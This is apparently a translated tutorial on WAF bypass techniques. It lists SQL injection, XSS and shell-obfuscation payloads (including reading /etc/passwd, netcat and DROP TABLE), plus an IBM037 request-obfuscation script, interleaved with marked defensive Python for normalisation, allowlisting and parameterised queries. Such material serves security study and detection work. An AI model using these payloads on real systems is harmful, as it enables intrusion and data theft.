Practical notes | A study of the various WAF bypass techniques
0X00 Fuzzing / brute force
Fuzz dictionaries
1. SecLists/Fuzzing
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
2. FuzzDB/Attack
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack
3. Other payloads (may get your IP banned, so use with care)
https://github.com/foospidy/payloads
0X01 Regex bypass
Quite a few WAFs rely on regex matching.
Blacklist detection / bypass
Case: SQL injection
• Step 1:
Filtered keywords: and, or, union
Possible regex: preg_match('/(and|or|union)/i', $id)
Blocked statement: union select user,password from users
Bypass statement: 1|| (select user from users where user_id =1) ='admin'
• Step 2:
Filtered keywords: and, or, union, where
Blocked statement: 1 || (select user from users where user_id =1) ='admin'
Bypass statement: 1|| (select user from users limit 1) ='admin'
• Step 3:
Filtered keywords: and, or, union, where, limit
Blocked statement: 1 || (select user from users limit 1) ='admin'
Bypass statement: 1|| (select user from users group by user_id having user_id =1) ='admin'
• Step 4:
Filtered keywords: and, or, union, where, limit, group by
Blocked statement: 1 || (select user from users group by user_id having user_id =1) ='admin'
Bypass statement: 1|| (select substr(group_concat(user_id),1,1) user from users) =1
• Step 5:
Filtered keywords: and, or, union, where, limit, group by, select
Blocked statement: 1|| (select substr(group_concat(user_id),1,1) user from users) =1
Bypass statement: 1||1=1 into outfile 'result.txt'
Bypass statement: 1||substr(user,1,1) ='a'
• Step 6:
Filtered keywords: and, or, union, where, limit, group by, select, '
Blocked statement: 1|| (select substr(group_concat(user_id),1,1) user from users) =1
Bypass statement: 1|| user_id is not null
Bypass statement: 1|| substr(user,1,1) = 0x61
Bypass statement: 1|| substr(user,1,1) = unhex(61)
• Step 7:
Filtered keywords: and, or, union, where, limit, group by, select, ', hex
Blocked statement: 1 || substr(user,1,1) = unhex(61)
Bypass statement: 1 || substr(user,1,1) = lower(conv(11,10,36))
• Step 8:
Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr
Blocked statement: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypass statement: 1 || lpad(user,7,1)
• Step 9:
Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr, white space
Blocked statement: 1 || lpad(user,7,1)
Bypass statement: 1%0b||%0blpad(user,7,1)
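Replaying the nine stages in code, as an added example that is not part of the original article: each stage's keyword list becomes a Python regex equivalent to the quoted PHP preg_match('/(and|or|union)/i', $id) check, and the blocked/bypass pairs are the ones listed above (one bypass per stage). The stage-9 "white space" rule is modelled as a literal ASCII space, which is exactly the gap the %0b (vertical tab) payload uses. Beside the blocklist, the block shows what actually closes the hole: an allowlist check that `id` is a short decimal integer, and a parameterised query run against a constructed in-memory SQLite table. The function names, the table and its rows are this example's own assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote

# (stage regex, blocked statement, bypass statement), taken from the walkthrough above.
STAGES = [
    (r"and|or|union",
     "union select user,password from users",
     "1|| (select user from users where user_id =1) ='admin'"),
    (r"and|or|union|where",
     "1 || (select user from users where user_id =1) ='admin'",
     "1|| (select user from users limit 1) ='admin'"),
    (r"and|or|union|where|limit",
     "1 || (select user from users limit 1) ='admin'",
     "1|| (select user from users group by user_id having user_id =1) ='admin'"),
    (r"and|or|union|where|limit|group by",
     "1 || (select user from users group by user_id having user_id =1) ='admin'",
     "1|| (select substr(group_concat(user_id),1,1) user from users) =1"),
    (r"and|or|union|where|limit|group by|select",
     "1|| (select substr(group_concat(user_id),1,1) user from users) =1",
     "1||substr(user,1,1) ='a'"),
    (r"and|or|union|where|limit|group by|select|'",
     "1|| (select substr(group_concat(user_id),1,1) user from users) =1",
     "1|| substr(user,1,1) = unhex(61)"),
    (r"and|or|union|where|limit|group by|select|'|hex",
     "1 || substr(user,1,1) = unhex(61)",
     "1 || substr(user,1,1) = lower(conv(11,10,36))"),
    (r"and|or|union|where|limit|group by|select|'|hex|substr",
     "1 || substr(user,1,1) = lower(conv(11,10,36))",
     "1 || lpad(user,7,1)"),
    # "white space" modelled as a literal space: %0b decodes to a vertical tab, not a space.
    (r"and|or|union|where|limit|group by|select|'|hex|substr| ",
     "1 || lpad(user,7,1)",
     "1%0b||%0blpad(user,7,1)"),
]


def blocklist_hit(pattern, value):
    """True when the stage's regex fires on the URL-decoded value (preg_match with the /i flag)."""
    return re.search(pattern, unquote(value), re.IGNORECASE) is not None


def evaluate_stages():
    """Per stage: (blocked statement caught?, bypass statement let through?)."""
    return [(blocklist_hit(p, blocked), not blocklist_hit(p, bypass))
            for p, blocked, bypass in STAGES]


def is_valid_id(value, max_digits=10):
    """Allowlist check: an id is a short decimal integer and nothing else."""
    return re.fullmatch(r"[0-9]{1,%d}" % max_digits, unquote(value)) is not None


def _sample_db():
    """Constructed sample data for the example, not real credentials."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "sample-hash-1"), (2, "guest", "sample-hash-2")])
    return conn


def lookup_user(raw_id):
    """Parameterised lookup: the value is bound as data, never spliced into the SQL text,
    so the keyword list is irrelevant to whether the query is safe."""
    conn = _sample_db()
    try:
        row = conn.execute("SELECT user FROM users WHERE user_id = ?",
                           (unquote(raw_id),)).fetchone()
    finally:
        conn.close()
    return row[0] if row else None


if __name__ == "__main__":
    for stage, (caught, slipped) in enumerate(evaluate_stages(), start=1):
        print(f"stage {stage}: blocked statement caught={caught}, bypass let through={slipped}")
    print("allowlist rejects every bypass:", not any(is_valid_id(b) for _, _, b in STAGES))
```

Every stage reports caught=True and let through=True: each blocklist catches the previous payload and misses the next one, whereas the integer allowlist rejects all nine and the bound parameter returns no row for any of them.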
0X02 Obfuscation / encoding
1. Case toggling
Standard: <script>alert()</script>
Bypassed: <ScRipT>alert()</sCRipT>
Standard: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'
2. URL encoding
Blocked: <svG/x=">"/oNloaD=confirm()//
Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
Blocked: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29
3. Unicode encoding
Standard: <marquee onstart=prompt()>
Obfuscated: <marquee onstart=\u0070r\u06f\u006dpt()>
Blocked: /?redir=http://google.com
Bypassed: /?redir=http://google。com (Unicode substitution)
Blocked: <marquee loop=1 onfinish=alert()>x
Bypassed: <marquee loop=1 onfinish=alert︵1)>x (Unicode substitution)
TIP: see this and this report on HackerOne. :)
4. HTML entity encoding
Standard: "><img src=x onerror=confirm()>
Encoded: &quot;&gt;&lt;img src=x onerror=confirm()&gt; (general form)
Encoded: &#34;&#62;&#60;img src=x onerror=confirm()&#62; (numeric reference)
5. Mixed encoding
WAF rules often tend to filter out one specific type of encoding.
Such filters can be bypassed by mixed-encoding payloads.
Tabs and newlines add further obfuscation.
Obfuscated:
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>
7. Double URL encoding
This requires the server side to URL-decode more than once.
Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\
Standard: <script>alert()</script>
Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E
8. Wildcards
Used for Linux command injection: bypass through shell wildcards.
Standard: /bin/cat /etc/passwd
Obfuscated: /???/??t /???/??ss??
Used chars: / ? t s
Standard: /bin/nc 127.0.0.1 1337
Obfuscated: /???/n? 2130706433 1337
Used chars: / ? n [0-9]
9. Dynamic payload generation
Standard: <script>alert()</script>
Obfuscated: <script>eval('al'+'er'+'t()')</script>
Standard: /bin/cat /etc/passwd
Obfuscated: /bi'n'''/c''at' /e'tc'/pa''ss'wd
Bash allows path concatenation for execution.
Standard: <iframe/onload='this["src"]="javascript:alert()"';>
Obfuscated: <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';>
9. Junk characters
Normal payloads get filtered out easily.
Adding some junk characters helps avoid detection (specific cases only).
They often help in confusing regex-based firewalls.
Standard: <script>alert()</script>
Obfuscated: <script>+-+-1-+-+alert(1)</script>
Standard: <BODY onload=alert()>
Obfuscated: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>
NOTE: the statements above may break the regex match and so achieve a bypass.
Standard: <a href=javascript;alert()>ClickMe
Bypassed: <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
10. Inserting line breaks
Some WAFs may not match across line breaks.
Standard: <iframe src=javascript:confirm(0)">
Obfuscated: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">
11. Uninitialized variables
Insert undefined variables into bash and perl command lines to disrupt the regex.
TIP: any non-existent variable name will do.
$aaaa, $sdayuhjbsad, $dad2ed
all work.
Level 1 obfuscation: normal
Standard: /bin/cat /etc/passwd
Obfuscated: /bin/cat$u /etc/passwd$u
Level 2 obfuscation: position based
Standard: /bin/cat /etc/passwd
Obfuscated: $u/bin$u/cat$u $u/etc$u/passwd$u
Level 3 obfuscation: random characters
Standard: /bin/cat /etc/passwd
Obfuscated: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff
A carefully crafted payload:
$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf
12. Tabs and line feeds
Most WAFs match on spaces rather than tabs.
Standard: <IMG SRC="javascript:alert();">
Bypassed: <IMG SRC="	javascript:alert();">
Variant: <IMG SRC="	jav	ascri	pt:alert	();">
Standard: http://test.com/test?id=1 union select 1,2,3
Obfuscated: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3
Standard: <iframe src=javascript:alert(1)></iframe>
Obfuscated:
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
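The shell-side tricks in sections 8, 9 and 11 (wildcards, empty quotes spliced into paths, undefined variables) all target signatures that look for a literal command string. The added example below, which is not code from the original article, shows the defender's counter: normalise the command line before matching, in the spirit of ModSecurity's cmdLine transformation (a simplified re-implementation, not a byte-for-byte copy of it), and treat wildcard-only paths as their own signal because they cannot be normalised back to a literal command. The signature list and the function names are this example's own.

```python
import re


def cmdline_normalize(value):
    """Simplified cmdLine-style normalisation: drop quote and backslash noise,
    blank out shell variable references (an undefined variable expands to nothing),
    collapse whitespace and lowercase."""
    v = re.sub(r"[\"'\\^]", "", value)                      # /bi'n'''/c''at' -> /bin/cat
    v = re.sub(r"\$\{?[A-Za-z_][A-Za-z0-9_]*\}?", "", v)    # $u, $aaaaaa, ${u} -> ''
    v = re.sub(r"\s+", " ", v).strip().lower()
    return v


# A path-like token that contains a glob character, e.g. /???/??t
WILDCARD_PATH = re.compile(r"(^|\s)/[^\s]*[?*][^\s]*")

# Illustrative only: a command name at the start of the line or right after a
# shell separator. A real rule set is far larger than this.
COMMAND_SIGNATURE = re.compile(r"(^|[;|&`(]\s*)(/bin/)?(cat|nc|bash)(\s|$)")


def looks_like_wildcard_path(value):
    """Globs cannot be normalised to a literal command, so flag their shape instead."""
    return WILDCARD_PATH.search(cmdline_normalize(value)) is not None


def detect_command(value):
    """Return 'command', 'wildcard-path' or None for one (already URL-decoded) input."""
    normalised = cmdline_normalize(value)
    if COMMAND_SIGNATURE.search(normalised):
        return "command"
    if WILDCARD_PATH.search(normalised):
        return "wildcard-path"
    return None


if __name__ == "__main__":
    # Inputs below are the article's own payloads from sections 8, 9 and 11.
    for payload in ["/bi'n'''/c''at' /e'tc'/pa''ss'wd",
                    "$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff",
                    "/???/??t /???/??ss??",
                    "$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf"]:
        print(f"{payload!r:75} -> {cmdline_normalize(payload)!r} ({detect_command(payload)})")
```

The quote-splicing and variable-padding payloads all normalise to the plain `/bin/cat /etc/passwd`, which the literal signature then catches; the wildcard payloads do not, and are reported by shape instead. Percent-decoding is deliberately left to an earlier stage so that this function does one job.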
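The encoding tricks in sections 2, 4, 7, 10 and 12 above (URL and double URL encoding, HTML entities, case changes, line breaks and tabs) defeat a signature only when the inspection engine looks at the raw bytes. As an added example that is not from the original article, the Python below normalises an input into two canonical views before matching: repeated, bounded percent-decoding, HTML entity decoding, NUL removal and case folding, with control whitespace either collapsed to one space (right for token-separated grammars such as SQL) or deleted (what a URL scheme parser effectively sees, so a `javascript:` split by tabs is reassembled). The four signatures are illustrative placeholders, not a real rule set, and the function names are this example's own.

```python
import html
import re
from urllib.parse import unquote

# Decode at least as many times as the back end will (double encoding, section 7),
# but bound the loop so that input can never keep us decoding.
MAX_DECODE_ROUNDS = 3


def url_decode_repeat(value, rounds=MAX_DECODE_ROUNDS):
    """Percent-decode until the text stops changing or the round limit is hit."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def canonical_views(value):
    """Two canonical forms of one input, because no single whitespace rule fits every grammar."""
    base = html.unescape(url_decode_repeat(value)).replace("\x00", "").lower()
    collapsed = re.sub(r"\s+", " ", base)                 # tabs/CR/LF/VT -> one space (SQL)
    stripped = re.sub(r"[\t\n\r\x0b\x0c]", "", base)      # deleted outright (URL schemes)
    return collapsed, stripped


# Illustrative signatures only; they stand in for a real rule set.
SIGNATURES = [
    r"<script\b",
    r"\bunion\b.*\bselect\b",
    r"\bon(load|error|start|finish|wheel|toggle)\s*=",
    r"javascript\s*:",
]


def detect(value):
    """Return the first signature that matches any canonical view, or None."""
    for view in canonical_views(value):
        for signature in SIGNATURES:
            if re.search(signature, view):
                return signature
    return None


def raw_detect(value):
    """The naive engine: the same signatures applied to the raw input with only case folding."""
    lowered = value.lower()
    return next((s for s in SIGNATURES if re.search(s, lowered)), None)


if __name__ == "__main__":
    # The article's own payloads from the sections named above.
    for payload in ["%253Cscript%253Ealert()%253C%252Fscript%253E",
                    "uNIoN%28sEleCT+1%2C2%2C3%29",
                    "1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3",
                    "<iframe src=j\ta\tv\ta\ts\tc\tr\ti\tp\tt\t:a\tl\te\tr\tt\t%28\t1\t%29></iframe>",
                    "&#34;&#62;&#60;img src=x onerror=confirm()&#62;"]:
        print(f"raw={raw_detect(payload)!s:40} normalised={detect(payload)}")
```

The decode bound matters in both directions: a WAF that decodes fewer times than the application misses double-encoded input, and one with no bound can be made to spend its time decoding. The event-handler signature is deliberately narrow; a bare `on\w+=` would also flag harmless parameters such as `onboarding=1`.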
13. Token breakers (could not translate this well; it appears to refer to closing out the SQL injection context)
Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.
Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
However, the request must still remain valid while using token breakers.
Case: unknown token for the tokenizer
Payload: ?id='-sqlite_version() UNION SELECT password FROM users--
Case: unknown context for the parser (notice the uncontexted bracket)
Payload 1: ?id=123);DROP TABLE users--
Payload 2: ?id=1337) INTO OUTFILE 'xxx'--
TIP: more payloads can be found in this cheat sheet.
14. Obfuscation in other formats
Many web applications support different encoding types (see the table below).
Obfuscate into an encoding type the server can parse but the WAF cannot.
Case: IIS
IIS 6, 7.5, 8 and 10 (ASPX v4.x) accept IBM037 characters.
Encoded parameter names and values can be sent.
Original request:
POST /sample.aspx?id1=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41
id2='union all select * from users--
Obfuscated request + URL encoding:
POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115
%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
TIP: the small script below converts between encodings.
import urllib.parse, sys
from argparse import ArgumentParser

lackofart = '''
OBFUSCATOR
'''

def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False,
                urlDecodeInput=True, urlEncodeOutput=True):
    def emit(raw):
        # Percent-encode the charset-encoded bytes, or pass them through byte-for-byte
        # (latin-1 round-trips every byte value) when raw output is requested.
        return urllib.parse.quote_plus(raw) if urlEncodeOutput else raw.decode('latin-1')

    # '=' and '&' stay as plain ASCII unless explicitly requested, because most servers
    # split on them before applying the charset (see the table below).
    equalSign = emit("=".encode(charset)) if encodeEqualSign else "="
    ampersand = emit("&".encode(charset)) if encodeAmpersand else "&"
    if '=' in params:
        # name=value[&name=value...]: encode each name and value separately.
        # (The original condition `'=' and '&' in params` only ever tested for '&'.)
        pieces = []
        for param_pair in params.split("&"):
            param, _, value = param_pair.partition("=")
            if urlDecodeInput:
                param = urllib.parse.unquote(param)
                value = urllib.parse.unquote(value)
            pieces.append(emit(param.encode(charset)) + equalSign + emit(value.encode(charset)))
        return ampersand.join(pieces)
    # Bare string without a name=value structure: encode it as a whole.
    if urlDecodeInput:
        params = urllib.parse.unquote(params)
    return emit(params.encode(charset))

def main():
    print(lackofart)
    parser = ArgumentParser('python3 obfu.py')
    parser._action_groups.pop()
    # A simple hack to have required arguments and optional arguments separately
    required = parser.add_argument_group('Required Arguments')
    optional = parser.add_argument_group('Optional Arguments')
    # Required Options
    required.add_argument('-s', '--str', help='String to obfuscate', dest='str')
    required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc')
    # Optional Arguments (main stuff and necessary)
    optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')
    optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')
    args = parser.parse_args()
    if len(sys.argv) <= 1 or not (args.str and args.enc):
        parser.print_help()
        sys.exit(1)
    print('Input: %s' % (args.str))
    print('Output: %s' % (paramEncode(params=args.str, charset=args.enc,
                                      urlDecodeInput=args.udi, urlEncodeOutput=args.ueo)))

if __name__ == '__main__':
    main()
Server | Usable encodings | Notes |
---|---|---|
Nginx, uWSGI-Django-Python3 | IBM037, IBM500, cp875, IBM1026, IBM273 | Encode both parameter names and values. The server URL-decodes names and values. The equals sign and & must be encoded (but not URL-encoded). |
Nginx, uWSGI-Django-Python2 | IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424 | Encode both parameter names and values. The server URL-decodes names and values. The equals sign and & must not be encoded in any way. |
Apache-TOMCAT8-JVM1.8-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 | Parameter names in their original form (URL encoding can be used as usual). Body may or may not be URL-encoded. The equals sign and & must not be encoded in any way. |
Apache-TOMCAT7-JVM1.6-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 | Parameter names in their original form (URL encoding can be used as usual). Body may or may not be URL-encoded. The equals sign and & must not be encoded in any way. |
IIS6, 7.5, 8, 10 -ASPX (v4.x) | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025 | Parameter names in their original form (URL encoding can be used as usual). Body may or may not be URL-encoded. The equals sign and & must not be encoded in any way. |
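The table rows all describe the same server-side behaviour: the body is split on raw '=' and '&' first, and each name and value is then decoded with the charset declared in Content-Type. A WAF that pattern-matches the percent-decoded bytes as if they were ASCII sees nothing. The added example below, which is not from the original article, replays the obfuscated IIS request above through that decoding order, and beside it shows a policy that simply refuses charsets the application does not need. The allowed-charset set and the function names are this example's assumptions; the body and Content-Type are the article's.

```python
import re
from urllib.parse import unquote_to_bytes

# The obfuscated request from the IIS case above (the article's own bytes).
OBFUSCATED_CT = "application/x-www-form-urlencoded; charset=ibm037"
OBFUSCATED_BODY = ("%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3"
                   "%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60")

# Policy assumption for this example: the application only ever needs these.
ALLOWED_CHARSETS = {"utf-8", "us-ascii", "iso-8859-1"}

# Illustrative placeholder for a real rule set.
SQLI_SIGNATURE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)


def declared_charset(content_type, default="utf-8"):
    """The charset parameter of a Content-Type header, lowercased; the default when absent."""
    match = re.search(r"charset\s*=\s*\"?([\w.:-]+)", content_type, re.IGNORECASE)
    return (match.group(1) if match else default).lower()


def decode_form(body, charset):
    """Mirror the servers in the table: split on raw '&' and '=' first, then percent-decode
    each part to bytes and decode those bytes with the declared charset."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_to_bytes(name).decode(charset)] = unquote_to_bytes(value).decode(charset)
    return fields


def inspect_request(body, content_type):
    """('reject', charset) for a charset outside the allowlist; otherwise decode the body the
    way the back end will and return ('block', fields) or ('allow', fields)."""
    charset = declared_charset(content_type)
    if charset not in ALLOWED_CHARSETS:
        return ("reject", charset)
    fields = decode_form(body, charset)
    if any(SQLI_SIGNATURE.search(v) for v in fields.values()):
        return ("block", fields)
    return ("allow", fields)


if __name__ == "__main__":
    print("raw bytes match:", bool(SQLI_SIGNATURE.search(OBFUSCATED_BODY)))
    print("decoded as the server sees it:", decode_form(OBFUSCATED_BODY, "ibm037"))
    print("policy decision:", inspect_request(OBFUSCATED_BODY, OBFUSCATED_CT))
```

Decoded through the ibm037 codec the body reads `id2='union all select * from users--`, which the signature catches; the raw percent-encoded form contains no such text. Refusing the charset outright is the cheaper defence, because it does not require the WAF to support every codec the back end does.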
0X04 HTTP parameter pollution
Technique
This attack relies on how the server interprets parameters that share the same name.
Situations that may lead to a bypass:
The server uses the last received parameter while the WAF only inspects the first.
The server joins the values of like-named parameters while the WAF inspects them separately.
Below is a comparison of how various servers interpret repeated parameters.
Environment | Parameter parsing | Example |
---|---|---|
ASP/IIS | Joined with a comma | par1=val1,val2 |
JSP, Servlet/Apache Tomcat | First parameter is the result | par1=val1 |
ASP.NET/IIS | Joined with a comma | par1=val1,val2 |
PHP/Zeus | Last parameter is the result | par1=val2 |
PHP/Apache | Last parameter is the result | par1=val2 |
JSP, Servlet/Jetty | First parameter is the result | par1=val1 |
IBM Lotus Domino | First parameter is the result | par1=val1 |
IBM HTTP Server | Last parameter is the result | par1=val2 |
mod_perl, libapeq2/Apache | First parameter is the result | par1=val1 |
Oracle Application Server 10G | First parameter is the result | par1=val1 |
Perl CGI/Apache | First parameter is the result | par1=val1 |
Python/Zope | First parameter is the result | par1=val1 |
IceWarp | Returns a list | ['val1','val2'] |
AXIS 2400 | Last parameter is the result | par1=val2 |
DBMan | Joined with two tildes | par1=val1~~val2 |
mod-wsgi (Python)/Apache | Returns a list | ARRAY(0x8b9058c) |
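To make the table concrete, the added example below (not code from the original article) resolves a repeated parameter the three ways the table lists (first value, last value, comma-join) and contrasts a check that only looks at the first occurrence with one that inspects every occurrence and the joined form as well. The query strings are constructed samples, the signature is an illustrative placeholder, and the function names are this example's own.

```python
import re
from urllib.parse import parse_qsl


def occurrences(query, name):
    """All values sent for one parameter name, in wire order."""
    return [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]


def resolve(query, name, strategy):
    """How a back end sees a repeated parameter, per the table above:
    'first' (Tomcat, Jetty, Perl CGI, ...), 'last' (PHP/Apache, IBM HTTP Server, ...),
    'join' (ASP and ASP.NET on IIS, which join with a comma)."""
    values = occurrences(query, name)
    if not values:
        return None
    if strategy == "first":
        return values[0]
    if strategy == "last":
        return values[-1]
    if strategy == "join":
        return ",".join(values)
    raise ValueError("unknown strategy: %s" % strategy)


def duplicated_names(query):
    """Parameter names sent more than once: a cheap HPP indicator worth logging."""
    seen, dupes = set(), set()
    for k, _ in parse_qsl(query, keep_blank_values=True):
        (dupes if k in seen else seen).add(k)
    return dupes


# Illustrative placeholder for a real rule set.
SQLI_SIGNATURE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)


def naive_check(query, name):
    """The blind spot described above: only the first occurrence is inspected."""
    first = resolve(query, name, "first")
    return bool(first) and SQLI_SIGNATURE.search(first) is not None


def robust_check(query, name):
    """Inspect every occurrence and every resolution a back end might apply."""
    candidates = occurrences(query, name) + [resolve(query, name, "join") or ""]
    return any(SQLI_SIGNATURE.search(c) for c in candidates)


# Constructed samples (not from the article): the payload hidden in the last occurrence,
# and one split over two occurrences so that only the comma-joined form contains it.
SAMPLE_LAST = "id=1&id=1 union select 1,2,3"
SAMPLE_SPLIT = "id=1 union&id=select 1,2,3"

if __name__ == "__main__":
    for sample in (SAMPLE_LAST, SAMPLE_SPLIT):
        print(sample, "| duplicates:", duplicated_names(sample))
        for strategy in ("first", "last", "join"):
            print("  ", strategy, "->", resolve(sample, "id", strategy))
        print("   naive:", naive_check(sample, "id"), "robust:", robust_check(sample, "id"))
```

The simplest policy is stricter still: an application that expects a single `id` can reject any request in which `duplicated_names` is non-empty, which removes the interpretation gap instead of trying to cover every row of the table.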
0X05 Browser quirks
Charset bugs:
Try changing the charset header to a wider Unicode encoding (e.g. UTF-32).
The payload fires when the site decodes it.
Example request:
GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept-Charset: utf-32; q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
When the site loads, it encodes the input in the UTF-32 encoding we set, and because the page's output encoding is UTF-8 it is rendered as: "<script>alert(1)</script>"
which triggers the XSS.
Fully URL-encoded payload:
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
Null bytes
Null bytes are commonly used as string terminators.
Example payloads:
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
Standard: <a href="javascript:alert()">
Obfuscated: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>
Variant: <a0x00href="javascript:alert(1)">clickme</a>
Parsing errors
The RFC states that a node name may not start with whitespace,
but we can use special characters such as `%`, `//`, `!`, `?`, etc.
Examples:
<//style=x:expression\28write(1)\29> - Works up to IE7 (Source)
<!--[if]><script>alert(1)</script -->- Works up to IE9 (Reference)
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> - Works in IE7 (Reference)
<%div%20style=xss:expression(prompt(1))> - Works up to IE7
Unicode separators
Every browser has its own set of separators.
@Masato Kinugawa found the following by fuzzing:
IExplorer: 0x09, 0x0B, 0x0C, 0x20, 0x3B
Chrome: 0x09, 0x20, 0x28, 0x2C, 0x3B
Safari: 0x2C, 0x3B
FireFox: 0x09, 0x20, 0x28, 0x2C, 0x3B
Opera: 0x09, 0x20, 0x2C, 0x3B
Android: 0x09, 0x20, 0x28, 0x2C, 0x3B
Example:
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d
Replacement with other atypical equivalent syntax
Find constructs the WAF developers did not anticipate and use those.
Common keywords that some WAF developers overlook:
JavaScript functions:
- window
- parent
- this
- self
Tag attributes:
- onwheel
- ontoggle
- onfilterchange
- onbeforescriptexecute
- ondragstart
- onauxclick
- onpointerover
- srcdoc
SQL operators
lpad
lpad(string, padded_length, [pad_string]): the lpad function pads the string on the left with the given character.
lpad('tech',7) returns '   tech'
lpad('tech',2) returns 'te'
lpad('tech',8,'0') returns '0000tech'
lpad('tech on the net',15,'z') returns 'tech on the net'
lpad('tech on the net',16,'z') returns 'ztech on the net'
field
FIELD(str,str1,str2,str3,...)
Returns the index (1-based position) of str in the list str1, str2, str3, ...; returns 0 if str is not found.
+---------------------------------------------------------+
| FIELD('ej','Hej','ej','Heja','hej','foo')               |
+---------------------------------------------------------+
| 2                                                       |
+---------------------------------------------------------+
bit_count
The number of 1 bits in the binary representation. BIT_COUNT(10) returns 2, because 10 in binary is 1010.
Example payloads:
Case: XSS
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
Case: SQLi
SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
1%0b||%0bLPAD(USER,7,1)
Many alternatives to native JavaScript can be used:
JSFuck
JJEncode
XChars.JS
Abusing SSL/TLS ciphers:
Often the server accepts connections over a variety of SSL/TLS ciphers and versions.
Initiate the connection with a version the WAF does not support.
